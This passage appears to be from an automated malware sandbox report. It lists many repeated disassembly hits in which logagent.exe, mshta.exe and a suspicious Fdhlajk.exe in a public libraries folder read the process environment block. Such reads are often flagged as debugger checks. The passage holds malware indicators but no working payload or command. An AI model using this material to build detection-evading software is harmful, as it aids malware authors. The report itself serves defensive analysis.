          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04964F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04964F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAF0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAF120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAE480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAF0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAF120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAE480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D782E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D78F80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D78F50 push dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03175BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03134257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03170EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03170EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03170EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0312A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03123540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03158DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03174015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03174015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
